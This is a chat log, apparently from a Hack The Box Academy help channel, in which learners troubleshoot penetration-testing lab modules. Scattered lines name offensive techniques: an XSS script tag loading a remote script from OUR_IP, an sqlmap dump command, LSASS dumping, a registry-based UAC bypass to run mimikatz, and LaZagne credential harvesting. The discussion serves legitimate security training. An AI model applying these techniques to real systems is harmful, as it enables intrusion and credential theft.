you can try another type of ping like fping or hping
but if you need to ping internal hosts, just do it from within the machine your tunnel is connected to
Hi i could really use some help with windows privesc skills assessment part I
Im trying to abuse the privilege i have enabled
I tried juicy potato which gets me recv failed with error 10038.
printspoofer returns operation failed or timed out
Metasploit also returns an error when using getsystem
And Now im stuck
Greetings everyone. Just started with HTB academy. Look forward to seeking your guidance. Kindly advise if I can post my questions during the lessons in this channel, or if there's another channel to post questions/clarifications on the modules I go through?
~~ I'm kinda confused. I'm on Web Server Pivoting with Rpivot.|| I followed the steps, had a successful connection, but when I visit the internal ip on port 80 via proxychains it doesnt load. But when I curl it with internal on port 80 (With proxy chains) it comes up with an apache default page and even when I curl from pivot machine, the same content shows. Do I need to enumerate the web app or did I just do it wrong ||. Also when I curl the pivot machine, the exact same page shows ~~ NVM I solved it. Wrong ip lol
.
Still having issue with ssh to the target machine (Linux Privilege Escalation - Skill Assessment)
Read from remote host 10.129.255.177: Connection reset by peer
Connection to 10.129.255.177 closed.
client_loop: send disconnect: Broken pipe
Somebody?🙏
bruh why does no one help just tell to go to another channel
Change VPN regions until it works
had the same issue with RDP yesterday, for me ignoring the cert worked
/cert:ignore not quite sure what the ssh option would be though
Can someone please explain to me what is a CLSID in juicy potato
They didnt teach that in the module
Hello
in the Introduction to Windows Command Line
in the last part
skill assessment
i'm asked as follows
but i dont have user3 password i only have the password of user0 and user1
am i supposed to enumerate user0 and user1 for the password of user2 or what
There is a PS script with JP. Run that to identify CLSIDs that you can use.
Does the hint not provide any information that helps you?
Looks like I'm not the only one getting kicked out of SSH because of "Broken pipe" today?
Trying to switch regions now as suggested before...though I've already been through the region switching a few days ago because it wouldn't let me go into Full Screen mode on PwnBox otherwise, will see if that works now I suppose 🤷
Because this channel is for help with academy modules; if you want help with a box then ask in the appropriate channel. It's that simple.
ok
Reminder that vpn region and pwnbox region are not the same thing
understood. so was the suggestion to connect through an external VPN and go through regions there until it works?
The pwnbox utilizes the same vpn pack, you may need to restart the pwnbox when you change vpn regions
information gathering - web edition | web archives- there is no archive for this timestamp on the waybackmachine. im not sure what to do.
There is, are you sure that you are searching the correct domain?
im searching hackthebox.eu
because the older one worked for the question prior and i dont think it was registered from godaddy during 2017
nvm i found it- I still have no clue why it didnt work though because i just closed everything and re-searched/
nvm
the password of each user at each question is the answer of the previous one
Nothing like doing a ping scan of a class B network… (assuming I’m not down a rabbit hole)
Hey I’m new here who can teaching me penetration testing
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I’m sure their entire business is that. Pay for it and it teaches you….
Not all modules are to be paid for
Sure, welcome
Hi.
I'm having a hard time connecting to the xfreerdp from my pwnbox.
Command used: xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!
In: https://academy.hackthebox.com/module/81/section/962
Error: Connection refused, I've checked IP, multiple times
┌──(user42㉿Kali)-[~]
└─$ for i in {1..254};do (ping -c 1 172.16.5.$i | grep "bytes from" &); done
64 bytes from 172.16.5.15: icmp_seq=1 ttl=64 time=175 ms
alright guys i'm not crazy something is up. there is no other host that is up lol
this is the tunneling and pivoting skills assessment. anyone got any input? there is literally no other live IP (and this is the webserver in the start of it) I did a full ping sweep of the class B network it's on. I think something might be broken
Share the link 🙂
Sorry haven't done that one yet, thought of another similar one
Have you by any chance used xfreerdp from a pwnbox? 😛
Found the problem, having my VPN running while was the problem
I have yes, but most of the time I use my own machine.
Yo
ig something is off here
So, about my module issue... lol
anyone have any ideas?
before I pull out the 2 of the 3 remaining hairs I have left on the top of my head?
Just to be sure, did you wait a few minutes before you tried doing the ping sweep?
yes, I didn't even get to the point until after I found the creds to get into it....
maybe I'll just kill the box and start over and see if that helps
sigh lol
Can i dm u?
yes
Sent 🙂
Hello
I am working on Active Directory LDAP enum skills lab.
I am stuck on last final question, what non-default privilege does the htb-student usr have?
I have tried finding interesting ACL related to it and used whoami / priv still no success. Any nudge?
Try running that from an elevated session.
I tried that machine is not allowing it
Have you tried restarting it? In my notes, I have that I needed to restart it once.
https://academy.hackthebox.com/module/103/section/1008
<script src=http://OUR_IP/script.js></script>
I am stuck if anyone has a suggestion if the payload look like this except the ip field because i don't get any server request after successful registration
i want to know about the payload structure
Hi guys :] Just wanted to know if someone has actually been able to navigate the entire htb courses (talking about some actual ones like maybe pentester etc) WITHOUT subscription and just using cubes ? :/
I have a bootable pendrive for parrot os so maybe no need of the cloud based VMs they have maybe...just wanted to know if it is possible?
That section gives you a few different payloads you can try.
so it is other than this payload right?
Idk, test them within the different fields.
roger that
can i give one of the payloads in different fields at the same time?
Are you asking if you can test all fields at the same time? The section covers different techniques, which include testing them one at a time and doing them all the same time.
yes
I suggest reading through Loading a Remote Script again.
ok
On password attacks in the attacking LSASS section, I have gotten the lsass dump file, but using pypykatz on it triggers an error:
```
INFO:pypykatz:Parsing file lsass.dmp
ERROR:root:PEB parsing error!
```
I am using the latest version of pypykatz. Any help?
parsing error is likely that the file got corrupted in transit
in powershell Get-Filehash <filename> -Method md5 should give the md5 checksum of the lsass file
in terminal when you transfer md5sum <filename> to check
if they match -- no issues
no match -- corruption, try a diff transfer method
it's -Algorithm not -Method
Does HTB have modules on using Havoc?
The only C2 module that I am aware of covers Sliver.
Hey the Password module had some section added to it, and for the new Hashcat section, we are supposed to crack some hashes, which are they ?
Yea it changed in a sudden
I was doing Pth from windows and boom everything changed

Like we have this
But no additionnal resource, so what are the hashes we are supposed to crack ?
I will be doing the extra sections after Completing old one's
They have also removed 2 assessments
I'm on AD & though I was done with this module, feelsbad
You will probably need to go back and start over as it looks like the whole thing was updated a bit ago. #academy-announcements message
Check the resources section, go through the sections again and you can probably find your answer
Ah I have done the ad one
If you need any help in it you can contact me
Wow everything 
The assessment now only has 1 question
The same hashes that are used in the section, as they don't display the answers to those hashes being cracked.
Alright thanks
100% -> 84% 
What modules did they update
I was in the middle of password attacks and just noticed a bunch of new commands in the cheat sheet lol
Nvm it looks like it was just password attacks
Just password attacks, changes get announced in #academy-announcements
Ah too slow lol
What are the best red team hacking modules in academy as a beginner? I just finished getting started.
Is there not a good path or journey i could follow that will make me a good hacker
If you want to hack mobile try out the android modules, for web try the Bugbounty path, for general pen testing try the pen testing path
As a beginner where you start does not matter as much as you might think
I'm feeling pretty helpless here. I'm working on the Using Web Proxies > Encoding/Decoding module. We get the zip file and we're supposed to decode several times for the flag. I like to use CyberChef for stuff like this. I've tried so many different configurations (taking the hint into account) and can't seem to get it to decode into anything remotely resembling a flag.
use burpsuite's decoding
That presents another question: the zip file is presented in our browser, how do I get that file contents into the browser based Linux box? I can't seem to paste into the box.
there should be a clipboard icon on the pwnbox
OH! Ok, cool. I'll try that. Thank you
also i was able to get it with cyberchef pretty easy
once you get down to %xx%xx... that's the url
So strange. We're DEcoding right?
No matter what I try, I don't end up with something that looks URL encoded. It all keeps ending with a = (which leads me to believe it's still base64 encoded)
Wait! I think I got it! I don't want to share any spoilers so I'll just shut up now. Thanks again.
Welp, shit keeps disconnecting for me, so I’ll finish tunneling and pivoting tomorrow!
Hi, I'm working through the information security foundations module but a bunch of the sections are tutorials on how to install a VM, make a pentesting platform, etc (like this https://academy.hackthebox.com/module/87/section/883)
Do I need to install all this stuff and set up everything it tells me to for the rest of the module and the pentesting path? Or are these optional and just good practice?
Not everything is necessary but you will need a linux VM and a Windows VM
And specific tools in each
Got it yeah I set up a VM on virtualbox with parrotOS
it may not be clear but the examples in the section appears to be the hashes
yep it's the examples from the section
the new windows attack one was actually sm fun, I got it in ab 20 minutes of working on it but theres no way I would've got it without doing some of the windows privsec first
loved it tho
the only hash not directly in the reading is only in the example; but they all take < 30s to crack
I have a problem......in HTB's network enumeration with nmap module, the flag for the 'nmap scripting engine' section doesn't seem to be working. And i'm pretty sure I found the right flag, cause it was in the usual HTB{***} format. the flag was found on port 31337, and i retried several times (with a new VPN, new IP)
Depending on how you tackle this exercise, you might have to deal with UAC. If that is the case, one easy solution can be found by looking up the "msconfig UAC bypass".
having issues, with knowing how to bypass the UAC
I need some help.
Module: Login Brute Forcing
Task: Skill Assessment 2
Context: I was able to SSH to the target server, and used username-anarchy to generate a list of potential usernames based on some information I found in IncidentReport.txt. I even reread the corresponding section Web Services multiple times, but everytime I attempt to find the ftp user I get an error stating unable to connect.
Command used: medusa -h <IP address> -U usernames.txt -P passwords.txt -M ftp -t 5
Hey, may i get some help in the new module for finding a UAC bypass
i haven't done that module
Ah i see
wrong port; there's a robot on a common port 😉
@fathom pendant so its giving out a wrong flag value? cause i got the flag after running the default script.
I dunno, something is off today in Academy. earlier I had those persistent "bad pipe" errors when trying to connect to a target via ssh, now that that finally works, the target cannot resolve the host address for a file I'm supposed to download, when I use the IP directly, the connection times out...all problems on the target only.
Anyone else still struggling with technical glitches? I might just call it a day and try again tomorrow, what I'm currently doing should not be the hard part of the exercise 🙈
Targets don't have internet connection so if you're tryna download something you have to download it onto your VM/pwnbox and then transfer it
usually, yeah, but in this case I think I'm really just supposed to wget it straight from source? hm. will try something else, maybe I misread that part
There is no exception, all targets have internet disabled
yep, you're right, I just can't read. And Marci has told me this before, too
alrighty, sorry about that, imma put a post-it behind my screen "TARGET DOES NOT HAVE INTERNET ACCESS" to remind myself 😅
(I mean, makes sense, too? I dunno what I was thinking there)
it's not giving a wrong value per-se; just not the flag for the section you're on, the target is reused a bit for the module
but the section focuses more on a specific port, start there
I'm kinda just starting htb but some sections just seem kinda random
like here https://academy.hackthebox.com/module/87/section/904 it's info on setting up your own VPS
but I'm not tryna set up my own VPS right now
so am I expected to do anything with this information?
I took notes and that's it
are you doing a path
if its not relevant to you then skip it
alr thanks
You don't have to do any of that. I jumped right into the CPTS path with my own VM.
It can be useful information for people who don't know, though.
alr cool because I've set up a VM on my computer and that's it but there's a bunch of other sections on setting other stuff up
thanks
Yeah you really just need one way of doing it, and if you don't have any you can use the pwnbox.
ah okay got it
Test
?
I did consider what you said, but I'm spawning the target system for that section specifically. I even tried re-downloading the VPN connection file from that section to try again. And I've managed to solve the entire module except for that section. The flag I got in the section was used nowhere else. I'm thinking of raising a technical query to HTB for this now.....do u think its valid?
You don't need to follow setting up 1::1
Check the webserver robots.txt
oh i got the flag....thanks for the help!
In module Advanced Deserialization Attacks, section Example3: Binary, why do the payloads I find on the Internet are written sortedSet in the downstream form but here is the reverse? And when I write down, the error report does not have filename
Anyone familiar with how echo and the -n flag works? Just wanting to clarify something cos of different hashes I get for the new Introduction to Password Cracking section
-# nevermind I'm an idiot 😄
Can anyone give a hint to solve this?
linux priv esc targets are bit slower than usual targets (is it just for me?) using us acad2 vpn
Works pretty fine for me
have the questions in the password attack module been changed? because i'm doing the module again and cracking the hash in the "Writing Custom Wordlists and Rules" section gave me a different answer
anyone available for https://discordapp.com/channels/473760315293696010/774040263278592041/1379419289953501234 Update (Got the user now)
try using pwnbox for it, maybe it makes a difference
I got it now
Hi,
I have a technical problem at "Introduction to Malware Analysis" --> Dynamic Analysis
How can I fix this?
Module - Captive Portal - MAC Spoofing Section. After spoofing the MAC address the lab machine cannot connect anymore to the WLAN. What i did
- Connect to Lab machine and then connect to guest WIFI
- Lookup MAC addresses connected to hotspot with airmon-ng and wlan1 ifc
- Lookup IPs for MAC addresses
- take wlan0 ifc down
- spoof MAC Address for wlan0
- wlan0 ifc up
- change ip address
Then i cannot connect anymore to the Guest WIFI. Same happens with the automated script. Any help?
whenever modules get updated and shifted around, this happens
yup i did more sections and i notice that the answers are different for some of the questions
Hello
I'm working on web attacks - Advanced File Disclosure and I've been trying to use the error based method but the flag isn't showing I'm not sure if I'm requesting the right page
the machine is accessing my python server so the only issue I can think of is the flags dir
can anyone help?
debugging mode
anyone having issues installing dislocker ?
find a workaround, reanalyze the Logginfile with option -p // Case closed
I noticed that the three Level Labs are gone in the PASSWORD-ATTACK academy module, now there is one big Skill Assessment called 'The Credential Theft Shuffle'. So it is definitely changed compared to its yesterday structure.
Yes. I also felt a little lost when trying to use JuicyPotato. Just the content taught on the section alone is not enough.
By default, the CLSID used is that of BITS. You can find list of CLSIDs here: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
You have to try multiple CLSIDs and check which one creates the required process.
On one of the blogs that I read, following CLSIDs are reliable to escalate privileges to SYSTEM.
Can anyone tell me the answer of the final question in the assessment of Network Foundations
i just found out that they've added a few sections to the Password Attacks module, i am facing issue attempting to bypass the UAC in "Attacking Windows Credential Manager" section within the "password attacks" module.
What is the password mcharles uses for OneDrive?
click on the Hint, it helps
yes I tried to run the msconfig and to investigate how i can use it to bypass but when I attempted to run msconfig it required admin's creds ^^
i am missing something
i tried using the runas to open msconfig with mcharles but i failed ^_^
okay apparently i tried to execute it from the second user twice
my bad ^^ thanks
can anyone help me in this As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
Can someone help me explain this?
Hello friends, I need to think out loud about which direction to go on the command injection skills assessment (this one caught me off guard - all the injections through the module were via POST requests and then the assessment has a GET request) each of the functions has an associated function, but some of them will throw a very visible verbose error when you try to do something illegal or malicious. If something throws an error, I should be able to use an OR operator to direct the system to my obfuscated command. Thumbs up or flames if I'm on to something.
You oughta transfer mimikatz
and yes there are other ways to get the password, mostly using tools mentioned in the module
Regarding the Penetration Testing Process Module Penetration Testing Overview section the following statement doesn't make much sense to me:
In principle, employees are not informed about the upcoming penetration tests. However, managers may decide to inform their employees about the tests. This is because employees have a right to know when they have no expectation of privacy.
My understanding is employees have no expectation of privacy with information provided to an employer for legitimate business purposes nor do they have an expectation of privacy when interacting with employer infrastructure. Is this not correct?
It means that employees usually are not aware that a pentest is being conducted but legally they can be informed so they know to expect that there is a lack of privacy depending on the terms of the contract
Weird thing to say of course they can be legally informed, the company contracting the pentest is the client and the client has this discretion. But ok. Just felt so obvious I was sure I had to be missing something
I guess my bigger concern was about the statement they have a right to know now that I think about it
Yeah it is at the client's discretion which is why the managers are the ones that do the informing and not the pentesters
this doesn't seem coherent with my current understanding of business ethics and obligations
i.e. they already know they have no expectation of privacy, so it doesn't follow that an additional duty to inform exists.
Well the client must also have a privacy policy with the employees
ahh, I see in the case of an internal company privacy which might mandate disclosure to employees
interesting, alright thank you @waxen totem
All in all it depends on the contracts already in place and the contracts to be set in place
Hi I am doing Password Attacks Introduction to Hashcat
im trying to crack the first hash, which is '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1', I used this command
hashcat -a 0 -m 500 '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1' rockyou.txt
it gave me ||forever21|| but it's an incorrect answer
It's the other hash
that's the 0th hash...(?)
!!!!!
which one?
the next one that appears
can someone who has done the module Attacking Common Applications dm me
havent done them yet, but sure
What it does everyone.
"Introduction to Malware Analysis" -->Code Analysis How can I transfer data (resources) from Webportal HTB to the PWNBox?
Module : Password Attacks
https://academy.hackthebox.com/module/147/section/1334
I think in this one, the ans to the question is incorrect now after the change, though still showing correct. I can't resubmit the correct ans as I did it before.
Also, did anyone solve this new question? I'm stuck in this.
Hi guys, I have a problem with the academy module for the cpts. In particular, with the Privileged Access in Active Directory Enumeration & Attacks. The problem is with the question "What host can this user access via WinRM? (just the computer name) ?" I tried with all the hosts in the ad and reset the machine multiple times. I answered all the questions except this one. Any help pls? I'm currently stuck
Obviously I used the powerview command and the bloodhound raw cypher without success
Hi
hey guys i was at system info but their ques they didn't even teach much
but have given much higher level ques
hello
Hey, Dm Me I have solved this module
Same here, were you able to complete the second question ?
No bro, tried whole day
No solution
look for files on the shares
I found credentials, but they don't seem to work, even though it's very likely they are the correct ones, looking at them
just completed the new Attacking Windows Credential Manager section
Yeah but check this one. It's wrong should be reset I guess.
is it just me or does it not provide nearly enough info to succeed without external resources
module got updated so the answers filled in won't match the expected answer
they won't reset it, this happens whenever modules get updated and things get shifted around
to complete it using the methods provided you need to do a UAC bypass, which seems out of scope for password attacks
and the easier ways to do it aren't mentioned at all, which seems silly
what section?
Can I dm you?
i don't see where UAC bypass is needed
for the mimikatz example provided you need admin
I found a way to do it in mimikatz that didn't require it and i think it's strange the module didn't mention it
lab is taking forever to spawn for me; when i get around to recompleting this module i'll update you
i used a completely different method that didn't require UAC, mimikatz is not the only way
there's a few tools mentioned
like lazagne; literally ran it without needing to go through UAC bypass methods
Running both LaZagne and mimikatz both come back with empty password results, anything im missing?
@fathom pendant is hack the box certificate free?
No
Did you do the runas command?
Attacking Windows Credential Manager
I am having trouble with this new page/module added. This is my last question to complete the CPTS path.
Yes I have checked the hint. The UAC is how I was able to get mimikatz to run. I swapped the registry of eventviewer with mimikatz and that is how it was able to run. Now I have plaintext admin pass for mcharles.
Just not getting the onedrive cred. I am able to use the admin access from the mcharles user. I just can't get the onedrive password.
Question:"What is the password mcharles uses for OneDrive?"
to start cmd as mcharles?
Hello, I would like to know if it is possible to have information on a license plate?
Relay to SMS_admin appears to work, but doesn't. Why? Anyone? @fathom pendant ?
The second question for the Credential Hunting in Network Shares section of the new Password Attacks module is a pain 👀
has anyone been able to complete it ?
Okay so i just reset the box and i got it, previously it was showing null values and even the vaults being completely empty except for the policies. thanks !
Haven't touched that module
You'll need to get the new answer for the first question if it was already filled in
yep, done that already! But still no luck.
Been spidering through shares for hours now with the "new" user, and the only thing looking like the answer is not working
I ended up impersonating the user and then running ||vault::cred|| in mimikatz. Anyway my point is that it's weird/bad the method the module actually walks through is not the best one
Lazagne is delicious
Did you need to impersonate the user first?
The password required for the module is not saved in the vault of the user you’re given creds for, right?
mcharles cred vault wouldn't show up with vault::cred if i was the initial account
Just checking my understanding here
hi people i am new here i want to start
https://academy.hackthebox.com/ is your first step
When i transfer over either lazagne.exe or lazagne.py. Both fail to start. I will try again
Make sure you save them to a writeable directory, but the .exe should work
C:/temp
Thank you so much! I will say, lazagne.exe works but it will still crash after running for 5 -10 seconds. Luckily, I just kept rerunning it until I got a glimpse of the password!
run it through cmd
hey
I am new here
For those trying for the second question of the Credential Hunting in Network Shares section of the new Password Attacks module, enumeration is an iterative process 😉
Also, the question is misleading
But yeah, iterative process 😄
Another 'duh' moment: forgot the 'DOMAIN\' — it sometimes is really that simple.
What is the usual cause if my Windows 7 target host crashes when attempting a binary exploit? (Entire target crashed, had to reset unfortunately)
hey people, im stuck in Writing Custom Wordlists and Rules with Hashcat, need help please. Anyone?
For the cracking protected archive's part of password attacks what exactly is the sudo dislocker /dev/loop0p2 -u1234qwer -- /media/bitlocker
What does that do
Hallo guys
Osk
Idk
what windows service is related to pdf editing 🤔
Bro can you tell me one thing
The tunneling and pivoting skill assessment has been the most fun one yet. (In my opinion, going in the order of the pen tester track).
A bit of a newbie but stuck on inlanefreight unique paths cURL question — I get 13, but it says it’s wrong. What might I be missing? Or is there anywhere I can't get a hint on here?
Beo
so break the question down
curl inlanefreight.com
Filter out wherever you'd see a pattern like https://www.inlanefreight.com/<some info> or similar
uniquely sort them
count them
yep an essential part of answering the questions is being able to break down what it's asking you to do specifically
Lol
When I run this command it says unable to grab vmk or fvek and none of the provided decryption mean is decrypting the keys
can somebody help me on sqlmap Attack Tuning case 6?
i tried everything came to my mind
this is the command im using and its not working for me
sqlmap -u "http://94.237.121.120:31060/case6.php?col=id" --prefix='`)'--risk=3 --level=5 --batch --dump
Hello I am new here can you help me out BTW I've read the rules and got verified but how to use this app ?
any help or tips?
Any tips of how to act and use in this app ?
Please anyone ?

see #welcome
you haven't been verified as your role/name hasn't been updated to be linked to your htb account
Yeah I spent my whole day
Later before giving up I went complete manual
That's when I got it
Later when checked, manspider also gave the admin pass
lmao
@fathom pendant thank you😭
What's the problem ?
Yep, the question is a bit misleading imo, the lesson taken from finding the solution is interesting though.
well I'm making custom dictionaries but I don't know what I'm doing wrong...
dictionaries from Mark White data
steps solutions doesn't help at all and hint either
i was typing my question but decided to check it once more.. again.. AND i solved it myself! very small achievement but its something 😉
I just went over the Attacking Common Applications module and had a question regarding multimaster.dll. How would we know in an engagement to start analyzing that specific dll? Is there a list of DLLs which typically have hardcoded creds or connection strings? The same goes for linux. How would we know what and when to start reversing? Thank you for your time
In the Hashcat module ? I haven't been through it yet but I could take a look in an hour / two
password attacks module, writing custom wordlists and rules section
if you can help would be awesome
Ahh, the new one. Haven't been through it yet either, since I already did the module earlier. Will take a look at it later
guys mimikatz is giving me such a mistake ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) what is that?
can you dm me later?
In Pass the Certificate of Password Attack module, can't get to admin.
There's no port 80 open. How can I abuse AD CS NTLM Relay Attack (ESC8) then?
Any idea?
is there a channel to discuss specific machines? Those in the "Dedicated Labs" section of the enterprise HTB account? (e.g. "Isotope" machine)
there's no channel for enterprise labs
ok, thanks - bummer!
@fathom pendant can you check plz?
Haven't redone that module
And have you done credentials hunting in network traffic?
no will do
ok
I can't check if I'm right, because I can't check for the answer as it's already completed, but feel free to dm me so we can see what you've already done
You're not administrator with that account
I know but mcharles in password attacks seems to be the only user I can elevate to
Indeed. From there I believe there are at least two paths you can take to get your answer
One is mentioned in the hint, the other you already know I gather
did you solve Pass the Certificate?
look into what's possible on mimikatz without admin.
Not yet, should be able to finish tomorrow
I just went over the Attacking Common Applications module and had a question regarding multimaster.dll. How would we know in an engagement to start analyzing that specific dll? Is there a list of DLLs which typically have hardcoded creds or connection strings? The same goes for linux. How would we know what and when to start reversing? Thank you for your time
Anyone have any ideas for the credential harvesting network shares? everything seems to just not work, take too long, or spew out millions of things.
What DOMAIN\ do I log into with the credentials given for the MSSQL, Exchange, and SCCM Attacks skills assessment? Tried clientname.local, associated-client-name.local, misspelling.local and nothing seems to work. @cunning frigate any ideas?
Hey HTB peeps I need some help. I'm working on the LFI assessment. I was able to fingerprint the web server, but i can't get anything except "invalid input" not even wrappers seem to work any hints are appreciated
Hello? Anyone?
Freighlogistics
That's what I used and it's not working
I did it now. It was extremely easy
@fathom pendant Could you please point me in the right direction? 😅
Still nothing
It's been a minute but I don't recall that dll
Also i would like people to stop @ me randomly if I haven't engaged already in the conversation
Never mind, got it. Was a weird typo to say the least.
It should be freightlogistics, not freighlogistics, if I'm not wrong
so lost
can i dm you?
Except it was without the 's' at the end
ok
Anyone able to help with LFI assessment? Been trying everything i can think of and i'm stuck. 2 days in
which module
File Inclusion: Skills Assessment
I need help
I was able to get "invalid input" as a warning, but encoding the request doesn't seem to work to bypass LFI protections
have you tried php wrapper?
I have but i can try again
Seems to be removing ".." from the requests.
anyone have tips for the network shares credential harvesting? everything is giving too many results even when directing certain network shares.
yeah it takes lots of time
check juicy files
When opening explorer for the first time, you'll have a hint for the first question
As for the second, enumeration is iterative
guys who have completed password attacks credentials hunting in network traffic in what format one has to submit credit card number?
A string format
yes but it says wrong answer
Also, what kind of protocol would that type of request be ?
Thanks for the assist. I'm making progress but the baby woke up so time is up for now. Going in the right direction though. Thanks again you're awesome!
Do you have the number already ?
yes I have the number already and I found it easily but switching to regular expression
but I am submitting and it tells me incorrect number
I turned wireshark to regular expression mode and it works much more easily than using string and protocols and request and so on
answered all the questions immediately
That's weird, I didn't have any issue with the CC number
can i dm you?
Hi I am new here. Can’t talk in general thread. Totally new to a lot of hacking and computer such. Advice and guidance would be appreciated. Thank you
There's instructions in #welcome
Random question. Anyone tried doing academy from a tablet?
Hello, I'm stuck on "Public Exploits" module: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
I got:
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
23/tcp filtered telnet
111/tcp open rpcbind 2-4 (RPC #100000)
256/tcp filtered fw1-secureremote
5900/tcp filtered vnc
From these only ssh and rpcbind seemed doable (at least at my level).
SSH: 1) I explored ssh auxiliary/scanner/ssh/libssh_auth_bypass and that came back empty. 2) Also tried sudo nmap -sV --script ssh-auth-methods -p22 $IP, Supported authentication methods: publickey (nothing other than publickey) so I assume password bruteforcing is not the answer here... Then I ran out of ideas for SSH.
RPCBIND: 1) rpcinfo -p $IP returned only portmapper - there are no other RPC services (like NFS, NIS, Mountd, etc.) registered with it. 2) The only exploits related to rpcbind 2-4 are DoS type vulnerabilities... not a viable path to gain initial access (RCE or shell) to the target server.
Any suggestions?
you're given a public ip and port only focus on those
thats not on the OSCP? or am i mistaken
sir this is the HTB server, not offsec
Yeah i don't recall a module called Public exploits
But OSCP did have one called public exploits thats why
Public Exploit section of Getting Started
I've been around long enough to know the context
Holy moly i would've never known that lol props to you
I don't leave my house enough to learn different
right there with you. Hope someone answers.
Are you saying that, when given 83.136.252.13:52692, I need to only nmap or netcat 52692 on 83.136.252.13? but that port isn't even open according to nmap... Hmm. nmap only does common ports by default?
nmap only scans common ports
hmmm. ok. I will netcat that one
netcat may not necessarily be the answer either
i'd first check and see if it's a web server first 😉
OKie 🙂
muahhh - only in the real world they don't give you the port #
52692/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
Thank you! Please stick around in case I have more questions later (j/k)
Hey

